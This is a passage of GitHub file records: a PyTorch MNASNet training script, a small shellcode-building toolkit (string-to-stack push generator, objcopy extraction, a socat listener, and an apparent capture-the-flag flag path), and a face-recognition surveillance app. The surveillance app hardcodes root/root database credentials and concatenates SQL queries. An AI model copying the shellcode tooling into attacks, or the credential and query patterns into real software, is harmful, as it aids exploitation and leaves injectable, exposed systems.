init_method=args.dist_init, world_size=args.world_size,\n rank=args.local_rank)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],\n output_device=args.local_rank)\n print('Node #{}'.format(args.local_rank))\n else:\n model = torch.nn.parallel.DataParallel(model, device_ids=[args.local_rank], output_device=args.local_rank)\n\n optimizer_class = torch.optim.SGD\n optimizer_params = {\"lr\": args.learning_rate, \"momentum\": args.momentum, \"weight_decay\": args.decay,\n \"nesterov\": True}\n if args.find_clr:\n optimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum=args.momentum,\n weight_decay=args.decay, nesterov=True)\n find_bounds_clr(model, train_loader, optimizer, criterion, device, dtype, min_lr=args.min_lr,\n max_lr=args.max_lr, step_size=args.epochs_per_step * len(train_loader), mode=args.mode,\n save_path=args.save_path)\n return\n\n if args.sched == 'clr':\n scheduler_class = CyclicLR\n scheduler_params = {\"base_lr\": args.min_lr, \"max_lr\": args.max_lr,\n \"step_size\": args.epochs_per_step * len(train_loader), \"mode\": args.mode}\n elif args.sched == 'multistep':\n scheduler_class = MultiStepLR\n scheduler_params = {\"milestones\": args.schedule, \"gamma\": args.gamma}\n elif args.sched == 'cosine':\n scheduler_class = CosineLR\n scheduler_params = {\"max_epochs\": args.epochs, \"warmup_epochs\": args.warmup, \"iter_in_epoch\": len(train_loader)}\n elif args.sched == 'gamma':\n scheduler_class = StepLR\n scheduler_params = {\"step_size\": 30, \"gamma\": args.gamma}\n else:\n raise ValueError('Wrong scheduler!')\n\n optim = OptimizerWrapper(model, optimizer_class=optimizer_class, optimizer_params=optimizer_params,\n scheduler_class=scheduler_class, scheduler_params=scheduler_params,\n use_shadow_weights=args.dtype == torch.float16)\n best_test = 0\n\n # optionally resume from a checkpoint\n data = None\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location=device)\n args.start_epoch = checkpoint['epoch'] - 1\n best_test = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optim.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n elif os.path.isdir(args.resume):\n checkpoint_path = os.path.join(args.resume, 'checkpoint{}.pth.tar'.format(args.local_rank))\n csv_path = os.path.join(args.resume, 'results{}.csv'.format(args.local_rank))\n print(\"=> loading checkpoint '{}'\".format(checkpoint_path))\n checkpoint = torch.load(checkpoint_path, map_location=device)\n args.start_epoch = checkpoint['epoch'] - 1\n best_test = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optim.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(checkpoint_path, checkpoint['epoch']))\n data = []\n with open(csv_path) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n data.append(row)\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n if args.evaluate:\n loss, top1, top5 = test(model, val_loader, criterion, device, dtype, args.child) # TODO\n return\n\n csv_logger = CsvLogger(filepath=args.save_path, data=data, local_rank=args.local_rank)\n csv_logger.save_params(sys.argv, args)\n\n claimed_acc1 = None\n claimed_acc5 = None\n if args.input_size in claimed_acc_top1:\n if args.scaling in claimed_acc_top1[args.input_size]:\n claimed_acc1 = claimed_acc_top1[args.input_size][args.scaling]\n if not args.child:\n csv_logger.write_text('Claimed accuracy is {:.2f}% top-1'.format(claimed_acc1 * 100.))\n train_network(args.start_epoch, args.epochs, optim, model, train_loader, val_loader, criterion, mixup,\n device, dtype, args.batch_size, args.log_interval, csv_logger, args.save_path, claimed_acc1,\n claimed_acc5, best_test, args.local_rank, args.child)\n\n\ndef train_network(start_epoch, epochs, optim, model, train_loader, val_loader, criterion, mixup, device, dtype,\n batch_size, log_interval, csv_logger, save_path, claimed_acc1, claimed_acc5, best_test, local_rank,\n child):\n my_range = range if child else trange\n for epoch in my_range(start_epoch, epochs + 1):\n if not isinstance(optim.scheduler, CyclicLR) and not isinstance(optim.scheduler, CosineLR):\n optim.scheduler_step()\n train_loss, train_accuracy1, train_accuracy5, = train(model, train_loader, mixup, epoch, optim, criterion,\n device, dtype, batch_size, log_interval, child)\n test_loss, test_accuracy1, test_accuracy5 = test(model, val_loader, criterion, device, dtype, child)\n csv_logger.write({'epoch': epoch + 1, 'val_error1': 1 - test_accuracy1, 'val_error5': 1 - test_accuracy5,\n 'val_loss': test_loss, 'train_error1': 1 - train_accuracy1,\n 'train_error5': 1 - train_accuracy5, 'train_loss': train_loss})\n save_checkpoint({'epoch': epoch + 1, 'state_dict': model.state_dict(), 'best_prec1': best_test,\n 'optimizer': optim.state_dict()}, test_accuracy1 > best_test, filepath=save_path,\n local_rank=local_rank)\n\n csv_logger.plot_progress(claimed_acc1=claimed_acc1, claimed_acc5=claimed_acc5)\n\n if test_accuracy1 > best_test:\n best_test = test_accuracy1\n\n csv_logger.write_text('Best accuracy is {:.2f}% top-1'.format(best_test * 100.))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5737704634666443,
"alphanum_fraction": 0.7377049326896667,
"avg_line_length": 11.399999618530273,
"blob_id": "e8726c7854716613ceff8b56614530754fd96f3c",
"content_id": "a6ab9f55a0471b66add9e134eb8b59ff69c83f10",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "torch>=1.0.0\ntorchvision>=0.2.0\ntqdm>=4.19.4\nmatplotlib\nnumpy"
},
{
"alpha_fraction": 0.5790055394172668,
"alphanum_fraction": 0.5834254026412964,
"avg_line_length": 35.20000076293945,
"blob_id": "56baf0ac9ef994aaade09e9bcd5e8c46a38d68c9",
"content_id": "1af2e954fe9853750578982bf32a52b049f81839",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 905,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 25,
"path": "/cosine_with_warmup.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "# temporary file\nimport math\n\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass CosineLR(_LRScheduler):\n \"\"\"\n \"\"\"\n\n def __init__(self, optimizer, max_epochs, warmup_epochs, iter_in_epoch, eta_min=0, last_epoch=-1):\n self.T_max = (max_epochs - warmup_epochs) * iter_in_epoch\n self.T_warmup = warmup_epochs * iter_in_epoch\n self.eta_min = eta_min\n self.warmup_step = eta_min\n super(CosineLR, self).__init__(optimizer, last_epoch)\n\n def get_lr(self):\n if self.last_epoch > self.T_warmup:\n curr_T = self.last_epoch - self.T_warmup\n return [self.eta_min + (base_lr - self.eta_min) *\n (1 + math.cos(math.pi * curr_T / self.T_max)) / 2\n for base_lr in self.base_lrs]\n else:\n return [(base_lr - self.eta_min) * self.last_epoch / self.T_warmup for base_lr in self.base_lrs]\n"
}
] | 5 |
jaiverma/shellcode
|
https://github.com/jaiverma/shellcode
|
621057c0073a0310f6c16e901b3a5c84ab5f8836
|
884cdd91468e91f7891356e247f4a92714fe2af8
|
57b0565b71e497583ea85030cbb4b2cc2aa03f15
|
refs/heads/master
| 2020-08-27T23:40:02.436345 | 2020-02-29T18:25:05 | 2020-02-29T18:27:41 | 217,522,688 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.652996838092804,
"alphanum_fraction": 0.6656151413917542,
"avg_line_length": 16.61111068725586,
"blob_id": "4db78e5a145ee751298a0c1cb6d1671ce8d80824",
"content_id": "3883f22133297b1bf12bdbbfc4e30315a2edd9e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 317,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 18,
"path": "/README.md",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "# Shellcode\n\nThis is junk.\n\n## Misc\n\nDump `.text` section of binary to a file with `objcopy`. This is good for extracting shellcode out of a `.o` or `.out` file.\n\n```sh\n$ objcopy main.o --dump-section .text=main.text.bin\n```\n\n\nRun binary with `socat`.\n\n```sh\n$ socat TCP-LISTEN:1234,reuseaddr,fork EXEC:\"./a.out\"\n```\n"
},
{
"alpha_fraction": 0.5079365372657776,
"alphanum_fraction": 0.5590828657150269,
"avg_line_length": 18.55172348022461,
"blob_id": "618f02c099cd6571db5aa8dc9dc5da3ba1899e54",
"content_id": "bcebc6a17f6f4b330e511ee4c2a136bbf5dcfacb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 29,
"path": "/utils/str_to_stack.py",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "'''\nScript to convert a string to opcodes to push it\nonto the stack.\nE.g. 'Hello world\\n' ->\n push 0x0a646c72\n push 0x6f77206f\n push 0x6c6c6548\n'''\n\nimport sys\nimport codecs\n\ndef f(s):\n cmds = []\n # pad string to be a multiple of 4\n pad_n = len(s) % 4\n l_s = s[::-1]\n for i in range(0, len(l_s), 4):\n cmd = 'push 0x{}'.format(codecs.encode(l_s[i:i+4], 'hex').decode('utf-8'))\n cmds.append(cmd)\n return cmds\n\ndef main():\n s = b'hello world\\n'\n # s = b'//home//orw/flag'\n cmds = f(s)\n print('\\n'.join(cmds))\n\nmain()\n"
},
{
"alpha_fraction": 0.6355140209197998,
"alphanum_fraction": 0.672897219657898,
"avg_line_length": 14.285714149475098,
"blob_id": "67811a0ce757ba192cfb413c64703df6ffba22a7",
"content_id": "09fceaa2d79408001cb6b5d0990504f1ebd5b10a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 7,
"path": "/ll/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tnasm -f elf32 main.S\n\nmain.out: main.o\n\tgcc -m32 -static -o main.out main.o\n"
},
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7121211886405945,
"avg_line_length": 17.85714340209961,
"blob_id": "b417f6b599f7d5b7e914fa43606f417ed1692c51",
"content_id": "2973f9d05aa237622df4c065b8336fdd1e76cb05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/hello/arm/data/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tarm-linux-gnueabihf-as main.S -o main.o\n\nmain.out: main.o\n\tarm-linux-gnueabihf-ld main.o -o main.out\n"
},
{
"alpha_fraction": 0.5927419066429138,
"alphanum_fraction": 0.5967742204666138,
"avg_line_length": 15.533333778381348,
"blob_id": "fc35a3d7f6fb1904f66705a1bb50862cd90dc194",
"content_id": "3e703618cbc00bd2e54f5546393b0f9d3a27b4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 15,
"path": "/utils/hexdump.py",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "import sys\nimport codecs\n\ndef f(fname):\n data = bytes()\n with open(fname, 'rb') as f:\n data = f.read()\n return data\n\ndef main():\n shellcode = f(sys.argv[1])\n print(shellcode)\n print(codecs.encode(shellcode, 'hex'))\n\nmain()\n"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14,
"blob_id": "7f690f22a2a69a5e4b28cbef40dfaab6b436b2ea",
"content_id": "8291a50d2eec75cde49f8146629aec2b2a2e0776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/hello/x86/data/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tnasm -f elf32 main.S\n\nmain.out: main.o\n\tld -m elf_i386 main.o -o main.out\n"
}
] | 6 |
Reznov9185/Ensuring-Security-Using-Computer-Vision
|
https://github.com/Reznov9185/Ensuring-Security-Using-Computer-Vision
|
d7c8f94e0b33ff4b144f62dd359632b0582b6a42
|
17a93d0d6d20c1cbf569e6c68e48151d0f0e44b5
|
c61f56ae4941da7be614756f1757e430e2b79eb8
|
refs/heads/master
| 2021-03-27T12:30:14.774103 | 2018-10-13T17:40:26 | 2018-10-13T17:40:26 | 47,739,646 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5694581270217896,
"alphanum_fraction": 0.6098521947860718,
"avg_line_length": 24.58823585510254,
"blob_id": "035e625065cf86d07ba84caac361fc4cbc4337fe",
"content_id": "a5d28f99973c007126cba43722b75868f193b45c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3045,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 119,
"path": "/surveillance_db.sql",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "-- phpMyAdmin SQL Dump\n-- version 4.0.10deb1\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost\n-- Generation Time: Dec 01, 2015 at 01:31 PM\n-- Server version: 5.5.46-0ubuntu0.14.04.2\n-- PHP Version: 5.5.30-1+deb.sury.org~trusty+1\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `surveillance_db`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `access_entries`\n--\n\nCREATE TABLE IF NOT EXISTS `access_entries` (\n `access_id` int(11) NOT NULL AUTO_INCREMENT,\n `subject_id` int(11) NOT NULL,\n `access_time` text NOT NULL,\n `confidence` double NOT NULL,\n `origin_x` int(11) NOT NULL,\n `origin_y` int(11) NOT NULL,\n `height` int(11) NOT NULL,\n `width` int(11) NOT NULL,\n PRIMARY KEY (`access_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `authentication_table`\n--\n\nCREATE TABLE IF NOT EXISTS `authentication_table` (\n `room_id` int(11) NOT NULL,\n `subject_id` int(11) NOT NULL,\n PRIMARY KEY (`room_id`,`subject_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `authentication_table`\n--\n\nINSERT INTO `authentication_table` (`room_id`, `subject_id`) VALUES\n(1, 1),\n(1, 3);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `motion_entries`\n--\n\nCREATE TABLE IF NOT EXISTS `motion_entries` (\n `event_id` int(11) NOT NULL AUTO_INCREMENT,\n `room_id` int(11) NOT NULL,\n `occupied_time` text NOT NULL,\n PRIMARY KEY (`event_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `rooms`\n--\n\nCREATE TABLE IF NOT EXISTS `rooms` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `room_id` int(11) NOT NULL,\n `floor_number` int(11) NOT NULL,\n `building_no` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `room_id` (`room_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;\n\n--\n-- Dumping data for table `rooms`\n--\n\nINSERT INTO `rooms` (`id`, `room_id`, `floor_number`, `building_no`) VALUES\n(1, 100, 5, 2);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `subjects`\n--\n\nCREATE TABLE IF NOT EXISTS `subjects` (\n `subject_id` int(11) NOT NULL,\n `subject_name` text NOT NULL,\n PRIMARY KEY (`subject_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `subjects`\n--\n\nINSERT INTO `subjects` (`subject_id`, `subject_name`) VALUES\n(1, 'Saleh'),\n(2, 'Tawhid'),\n(3, 'Sajid');\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
},
{
"alpha_fraction": 0.7995750904083252,
"alphanum_fraction": 0.8094900846481323,
"avg_line_length": 31.837209701538086,
"blob_id": "7a026aa6c5a91a38a89e29363551e28ce6b99410",
"content_id": "d10cf79aa1b17450266ef38e7795477e4329ecf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1412,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 43,
"path": "/README.md",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "# Ensuring Security with Computer Vision\n\nArchitecture\n\n\nIn our implementation, we have used devices and computers which are general in terms\nof computation, performance and efficiency. The results would be more satisfactory if\ndevices and computers with higher computational ability could be used. In the next\niteration, such devices can be used. Considering computation for better computational\ntime and efficiency, we could reduce the number of recognition performed on the same\nperson while they are in our observation window. We can achieve this by tracking a\nrecognized person while they are in our observation window.\nWe have proposed and implemented a security system considering the scenario of an\norganizational security. Our aim was to derive data in real time so that extracted data\ncan be helpful as a tool to ensure and enhance security.\n\nProgramming Language and modules:\n\nLanguage: Python .\n\nModules: OpenCV, imutils, datetime, MySQLdb, Image from PIL, OS, numpy.\n\nDatabase:\n\nDatabase: mysql server version- 5.5.46.\n\nAlgorithms\n\nTraining:\n\n1. Haar Cascade frontal face classifier\n2. Local Binary Pattern Histogram.\n\nMotion detecting:\n\n1. Background subtraction\n2. Dilate\n3. Find Contour\n\nFace recognition:\n\n1. Haar Cascade frontal face classifier\n2. Predict with Local Binary Pattern Histogram.\n"
},
{
"alpha_fraction": 0.5273643136024475,
"alphanum_fraction": 0.546141505241394,
"avg_line_length": 40.0093879699707,
"blob_id": "09ee1ac7bc9f33dc9fb77b222d09970a01dc3498",
"content_id": "909e59b0a9c75157ced4d5754c26fa1954a3f3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8734,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 213,
"path": "/surveillance.py",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2, os, imutils, datetime, MySQLdb\nfrom PIL import Image\n\n#mysql connection\n\n\ndb = MySQLdb.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n db=\"surveillance_db\")\ncur = db.cursor()\n\nroom_id = 1\nglobal alarm\nalarm = 0\n\n# Haar cascade classifier for classifying frontal face\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nif face_cascade.empty():\n raise Exception(\"Can not find your cascade classifier file . Are you sure, the path is correct ?\")\n\n# Start train for recognition\n# For face recognition we will use the LBPH Face Recognizer\nrecognizer = cv2.createLBPHFaceRecognizer()\n\n\ndef training():\n def get_images_labels(path):\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n images = []\n labels = []\n for image_path in image_paths:\n # Read the image and convert to grayscale\n image_pil = Image.open(image_path).convert('L')\n # Convert the image format into numpy array\n image = np.array(image_pil, 'uint8')\n # Get the label of the image\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"subject\", \"\"))\n # Detect the face in the image\n faces = face_cascade.detectMultiScale(image)\n # If face is detected, append the face to images and the label to labels\n for (x, y, w, h) in faces:\n images.append(image[y: y + h, x: x + w])\n labels.append(nbr)\n cv2.imshow(\"Adding faces to traning set...\", image[y: y + h, x: x + w])\n cv2.waitKey(5)\n # return the images list and labels list\n return images, labels\n\n # Path to the Yale Dataset\n path = './training_faces'\n # Call the get_images_and_labels function and get the face images and the\n # corresponding labels\n images, labels = get_images_labels(path)\n cv2.destroyAllWindows()\n\n # Perform the training\n recognizer.train(images, np.array(labels))\n\n\ndef recognize(filename):\n predict_image_pil = Image.open(filename)\n predict_image = np.array(predict_image_pil, 'uint8')\n faces = face_cascade.detectMultiScale(predict_image)\n for (x, y, w, h) in faces:\n nbr_predicted, conf = recognizer.predict(predict_image[y: y + h, x: x + w])\n if conf < 60:\n insert_data = \"INSERT INTO access_entries( subject_id, access_time, confidence, origin_x, origin_y, height, width) VALUES (\" + str(nbr_predicted) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"',\" + str(conf) + \",\" + str(x) + \",\" + str(y) + \",\" + str(h) + \",\" + str(w) + \");\"\n #print(insert_data)\n cur.execute(insert_data)\n find_subject = \"SELECT subject_name FROM subjects WHERE subject_id = \" + str(nbr_predicted) + \";\"\n #print(find_subject)\n cur.execute(find_subject)\n cur.fetchone()\n for (subject_name) in cur:\n name = subject_name[0]\n print \"{} is Correctly Recognized with confidence {} at x={}, y={}, w={}, h={} .\".format(name, conf, x, y, w, h)\n #print(cur2)\n find_authentication = \"SELECT subject_id FROM authentication_table WHERE room_id = \" + str(room_id) + \";\"\n #print(find_authentication)\n cur.execute(find_authentication)\n cur.fetchall()\n global alarm\n for valid_subject in cur:\n if str(valid_subject[0]) == str(nbr_predicted):\n alarm = 0\n break\n else:\n alarm = 1\n print \"Face not identified with {} where confidence {} at x={}, y={}, w={}, h={} .\".format(nbr_predicted, conf, x, y, w, h)\n cv2.imshow(\"Recognizing Face\", predict_image[y: y + h, x: x + w])\n key = cv2.waitKey(1) & 0xFF\n # if the `q` key is pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n\ndef motion_detect(camera_id):\n motion_camera_feed = cv2.VideoCapture(camera_id)\n\n # initialize the first frame in the video stream\n firstFrame = None\n frame_count = 0\n\n global alarm\n alarm = 0\n\n # loop over the frames of the video\n while(motion_camera_feed.isOpened()):\n ret, frame = motion_camera_feed.read()\n frame_count += 1\n text = \"Unoccupied\"\n #cv2.imshow(\"Camera Feed\", frame)\n if motion_camera_feed is not None and frame_count %10 ==0:\n start_time = datetime.datetime.now()\n #print(\"Start time :\" + str(start_time.strftime(\"%A %d %B %Y %I-%M-%S%p %f\")))\n # resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n\n # if the first frame is None, initialize it\n if firstFrame is None:\n firstFrame = gray\n continue\n\n # compute the absolute difference between the current frame and\n # first frame\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 75, 255, cv2.THRESH_BINARY)[1]\n\n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n (cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # loop over the contours\n for c in cnts:\n # if the contour is too small, ignore it\n if cv2.contourArea(c) < 500:\n continue\n\n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n (x, y, w, h) = cv2.boundingRect(c)\n #cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = \"Occupied\"\n insert_data = \"INSERT INTO motion_entries(room_id,occupied_time) VALUES (\" + str(room_id) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"');\"\n #print(insert_data)\n cur.execute(insert_data)\n\n # draw the text and timestamp on the frame\n if text == \"Unoccupied\":\n b, g, r = 0, 255, 0\n else:\n b, g, r = 0, 0, 255\n if alarm == 1:\n cv2.putText(frame, \"Unauthorized Access (ALARM) \".format(text), (10, frame.shape[0] - 25),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n else:\n cv2.putText(frame, \"Authorized Access\".format(text), (10, frame.shape[0] - 25),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 1)\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (b, g, r), 2)\n cv2.putText(frame, datetime.datetime.now().strftime(\"%A %d %B %Y %I:%M:%S%p\"),\n (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 255, 0), 1)\n\n cv2.imshow(\"Security Feed: \"+str(camera_id), frame)\n #cv2.imshow(\"Thresh\", thresh)\n #cv2.imshow(\"Frame Delta\", frameDelta)\n\n #face detection\n faces = face_cascade.detectMultiScale(frame, 1.3, 5)\n i = 1\n for (x, y, w, h) in faces:\n img = Image.fromarray(frame[y:y + h, x:x + w])\n face_detected = img.convert('L')\n filename = './detected_faces/face_detected' + str(i) + '.png'\n cv2.imwrite(filename, np.array(face_detected))\n # cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n recognize(filename)\n # roi_gray = gray[y:y+h, x:x+w]\n # roi_color = frame[y:y+h, x:x+w]\n i += 1\n\n end_time = datetime.datetime.now()\n #print(\"End time : \" + str(end_time.strftime(\"%A %d %B %Y %I-%M-%S%p %f\")))\n diff = end_time-start_time\n print(\"Frame = \" + str(frame_count) + \" Difference = \" + str(divmod(diff.total_seconds(), 60)))\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key is pressed, break from the lop\n if key == ord(\"q\"):\n break\n # cleanup the camera and close any open windows\n motion_camera_feed.release()\n cv2.destroyAllWindows()\n\n\ndef main_func():\n camera1 = 0\n camera2 = 1\n training()\n\n\n motion_detect(camera1)\n #motion_detect(camera2)\n\n db.close()\n\nmain_func()"
},
{
"alpha_fraction": 0.553575336933136,
"alphanum_fraction": 0.5655292272567749,
"avg_line_length": 40.83636474609375,
"blob_id": "02668fd35efb4d720808dbadaf81ed553d7059be",
"content_id": "cae865e9289dd8c529ea45a0ee79f8d9f04f89cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4601,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 110,
"path": "/accessdetection.py",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2, os, datetime, MySQLdb\nfrom PIL import Image\n\ndb = MySQLdb.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n db=\"surveillance_db\")\ncur1 = db.cursor()\ncur2 = db.cursor()\n\n# Haar cascade classifier for classifying frontal face\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nif face_cascade.empty():\n raise Exception(\"Can not find your cascade classifier file . Are you sure, the path is correct ?\")\n\n# Start train for recognition\n# For face recognition we will use the LBPH Face Recognizer\nrecognizer = cv2.createLBPHFaceRecognizer()\n\ndef training():\n def get_images_labels(path):\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n images = []\n labels = []\n for image_path in image_paths:\n # Read the image and convert to grayscale\n image_pil = Image.open(image_path).convert('L')\n # Convert the image format into numpy array\n image = np.array(image_pil, 'uint8')\n # Get the label of the image\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"subject\", \"\"))\n # Detect the face in the image\n faces = face_cascade.detectMultiScale(image)\n # If face is detected, append the face to images and the label to labels\n for (x, y, w, h) in faces:\n images.append(image[y: y + h, x: x + w])\n labels.append(nbr)\n cv2.imshow(\"Adding faces to traning set...\", image[y: y + h, x: x + w])\n cv2.waitKey(50)\n # return the images list and labels list\n return images, labels\n\n # Path to the Yale Dataset\n path = './training_faces'\n # Call the get_images_and_labels function and get the face images and the\n # corresponding labels\n images, labels = get_images_labels(path)\n cv2.destroyAllWindows()\n\n # Perform the training\n recognizer.train(images, np.array(labels))\n\n# recognizer\n\n\ndef recognize(filename):\n predict_image_pil = Image.open(filename).convert('L')\n predict_image = np.array(predict_image_pil, 'uint8')\n faces = face_cascade.detectMultiScale(predict_image)\n for (x, y, w, h) in faces:\n nbr_predicted, conf = recognizer.predict(predict_image[y: y + h, x: x + w])\n if conf < 100:\n insert_data = \"INSERT INTO access_entries( subject_id, access_time, confidence, origin_x, origin_y, height, width) VALUES (\" + str(nbr_predicted) + \",'\" + str(datetime.datetime.now().strftime(\"%A %d %B %Y %I-%M-%S%p\")) + \"',\" + str(conf) + \",\" + str(x) + \",\" + str(y) + \",\" + str(h) + \",\" + str(w) + \");\"\n #print(insert_data)\n cur1.execute(insert_data)\n find_subject =\"SELECT subject_name FROM subjects WHERE subject_id = \" + str(nbr_predicted) + \";\"\n print(find_subject)\n cur2.execute(find_subject)\n cur2.fetchone()\n for (subject_name) in cur2:\n name = subject_name[0]\n print \"{} is Correctly Recognized with confidence {} at x={}, y={}, w={}, h={} .\".format(name, conf, x, y, w, h)\n #print(cur2)\n else:\n print \"{} not identified with confidence at x={}, y={}, w={}, h={} .\".format(nbr_predicted, conf, x, y, w, h)\n cv2.imshow(\"Recognizing 